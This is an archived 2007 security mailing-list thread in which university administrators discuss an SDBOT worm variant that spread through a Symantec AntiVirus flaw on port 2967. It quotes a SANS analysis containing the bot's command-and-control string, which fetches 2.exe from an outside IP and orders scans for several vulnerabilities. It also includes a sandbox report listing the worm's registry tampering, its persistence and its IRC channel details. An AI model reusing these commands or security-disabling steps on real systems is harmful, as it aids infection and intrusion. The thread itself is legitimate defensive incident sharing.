Educause Security Discussion mailing list archives

Re: Exploit on port 2967

From: Julian Thompson <jthmpsn2 () MEMPHIS EDU>
Date: Fri, 27 Apr 2007 11:43:24 -0500
We saw a variant of this worm that looked for 4 separate vulnerabilities
- one of them being the Symantec one. This was mitigated somewhat by
upgrading Symantec to 10.1.5 (at least) -- some days later Symantec also
updated their signatures (or sooner via RapidRelease) which helped track
down any strays. :-) (prior to vers 10 we didn't see any problems).

Anyway hope some of this is informative - this is a couple of months old
now

FYI I have copied an analysis from [SANDBOX] of the files (captured
using nepenthes) we were seeing dropped onto some machines. Our file
names differ (ours were 1.exe or 2.exe or somnumber.exe and that pulled
other pieces via ftp I believe) but I suspect it could be the same thing
in the end. We also had them analyzed by those nice people at SANS ISC.
(See below also)

1st from SANS as I sent it to them first :- 

------
Indeed a new SDBOT version. It does some "friendly" things like turning
off windows update, windows firewall, etc, before then joining its
Command&Control channel running on 203.121.79.138.  The C&C channel
still contains the instruction to download 2.exe, and also to propagate
further by scanning for some common vulnerabilities. 
 
s|!sftp 203.121.79.95 8081 1 1 2.exe -s|!asc netapi 30 3 0 -c -h -s|!asc
sym 30 3 0 -c -h -s|!asc dcom135 30 3 0 -c -h -s|!asc lsass445 30 3 0 -c
-h -s|!asc asn139 30 3 0 -c -h -s 
 
Thanks again for sending in the sample!
-daniel

-------

Next from Norman Sandbox

-------
 nepenthes-0da20c6938d385af3e766cc7b07967db-81.exe : W32/Malware
(Signature: W32/Malware.KUK)

 [ General information ]
    * Anti debug/emulation code present.
    * **Locates window " [class OLLYDBG]" on desktop.
    * **Locates window " [class FileMonClass]" on desktop.
    * **Locates window "NULL [class mIRC]" on desktop.
    * **Locates window "NULL [class AIM_CSignOnWnd]" on desktop.
    * File length:        59356 bytes.
    * MD5 hash: 0da20c6938d385af3e766cc7b07967db.

 [ Changes to filesystem ]
    * Creates file C:\WINDOWS\system\system.exe.
    * Deletes file c:\sample.exe.

 [ Changes to registry ]
    * Creates key "HKLM\Software\\Microsoft\\Windows".
    * Sets value "SYSTEMHOST"="c:\sample.exe" in key
"HKLM\Software\\Microsoft\\Windows".
    * Creates key "HKLM\System\CurrentControlSet\Services\SYSTEMSVC".
    * Sets value "ImagePath"=""C:\WINDOWS\system\system.exe"" in key
"HKLM\System\CurrentControlSet\Services\SYSTEMSVC".
    * Sets value "DisplayName"="Windows System Service" in key
"HKLM\System\CurrentControlSet\Services\SYSTEMSVC".
    * Deletes value "SYSTEMHOST" in key
"HKLM\Software\\Microsoft\\Windows".
    * Sets value "WaitToKillServiceTimeout"="7000" in key
"HKLM\System\CurrentControlSet\Control".
    * Modifies value "UpdatesDisableNotify"=" " in key
"HKLM\Software\Microsoft\Security Center".
    * Modifies value "AntiVirusDisableNotify"=" " in key
"HKLM\Software\Microsoft\Security Center".
    * Modifies value "FirewallDisableNotify"=" " in key
"HKLM\Software\Microsoft\Security Center".
    * Modifies value "AntiVirusOverride"=" " in key
"HKLM\Software\Microsoft\Security Center".
    * Modifies value "FirewallOverride"=" " in key
"HKLM\Software\Microsoft\Security Center".
    * Creates key
"HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto
Update".
    * Sets value "AUOptions"=" " in key
"HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto
Update".
    * Creates key "HKLM\System\CurrentControlSet\Services\wscsvc".
    * Sets value "Start"=" " in key
"HKLM\System\CurrentControlSet\Services\wscsvc".
    * Creates key "HKLM\System\CurrentControlSet\Services\TlntSvr".
    * Sets value "Start"=" " in key
"HKLM\System\CurrentControlSet\Services\TlntSvr".
    * Creates key
"HKLM\System\CurrentControlSet\Services\RemoteRegistry".
    * Sets value "Start"=" " in key
"HKLM\System\CurrentControlSet\Services\RemoteRegistry".
    * Creates key "HKLM\System\CurrentControlSet\Services\Messenger".
    * Sets value "Start"=" " in key
"HKLM\System\CurrentControlSet\Services\Messenger".
    * Sets value "restrictanonymous"=" " in key
"HKLM\System\CurrentControlSet\Control\Lsa".
    * Creates key
"HKLM\System\CurrentControlSet\Services\lanmanserver\parameters".
    * Sets value "AutoShareWks"="" in key
"HKLM\System\CurrentControlSet\Services\lanmanserver\parameters".
    * Sets value "AutoShareServer"="" in key
"HKLM\System\CurrentControlSet\Services\lanmanserver\parameters".
    * Creates key
"HKLM\System\CurrentControlSet\Services\lanmanworkstation\parameters".
    * Sets value "AutoShareWks"="" in key
"HKLM\System\CurrentControlSet\Services\lanmanworkstation\parameters".
    * Sets value "AutoShareServer"="" in key
"HKLM\System\CurrentControlSet\Services\lanmanworkstation\parameters".
    * Creates key
"HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate".
    * Sets value "DoNotAllowXPSP2"=" " in key
"HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate".
    * Creates key "HKLM\Software\Microsoft\OLE".
    * Sets value "EnableDCOM"="N" in key "HKLM\Software\Microsoft\OLE".

 [ Network services ]
    * Opens URL: http://www.google.com.
    * Connects to "www.google.com" on port 80 (TCP).
    * Opens URL: www.google.com/.
    * Looks for an Internet connection.
    * Connects to "host.ipv9.info" on port 19555 (TCP).
    * Sends data stream (15 bytes) to remote address "host.ipv9.info",
port 19555.
    * Connects to IRC Server.
    * IRC: Uses nickname [P0|USA|60424].
    * IRC: Uses username XP-3822.
    * IRC: Sets the usermode for user [P0|USA|60424] to -x+i.
    * IRC: Joins channel #host# with password z00n3d.

 [ Process/window information ]
    * Creates service "SYSTEMSVC (Windows System Service)" as
""C:\WINDOWS\system\system.exe"".
    * Attempts to access service "SYSTEMSVC".
    * Creates a mutex xUn3@8loi.
    * Attempts to access service "Tlntsvr".
    * Attempts to access service "RemoteRegistry".
    * Attempts to access service "Messenger".
    * Attempts to access service "SharedAccess".
    * Attempts to access service "wscsvc".

 [ Signature Scanning ]
    * C:\WINDOWS\system\system.exe (59356 bytes) : no signature
detection.

(C) 2004-2006 Norman ASA. All Rights Reserved.

----------------





-----Original Message-----
From: Mike Hanson [mailto:MHanson () CSS EDU] 
Sent: Friday, April 27, 2007 10:52 AM
To: SECURITY () LISTSERV EDUCAUSE EDU
Subject: [SECURITY] Exploit on port 2967

Hello,

Has anybody experienced the Symantec Corporate Edition AntiVirus stack
overflow worm in the last few weeks? We got hit with it here starting
this past Monday. Uses port 2967 on versions 10.0 and 10.1 of Corporate
Edition. We experienced a different variant of what is posted on the
Symantec site  
http://www.symantec.com/avcenter/security/Content/2006.05.25.html#  


This exploit Drops two files into C:\WINDOWS\system32\wbem  these files
are unsecapp32.exe and unsec.exe. It also drops ftp[1].exe in a Windows
Internet temp file.

This worm generated a tremendous traffic on our network. 

I have not been able to find much information on this variant but I
noticed on SANS Internet Storm Center website there is a lot activity on
port 2967.

Thank you.





Mike Hanson
Network Security Manager
The College of St. Scholastica
Duluth, MN 55811
 
(218)-723-7097
mhanson () css edu
Current thread:

Exploit on port 2967 Mike Hanson (Apr 27)
- <Possible follow-ups>
- Re: Exploit on port 2967 Jim Bollinger (Apr 27)
- Re: Exploit on port 2967 Julian Thompson (Apr 27)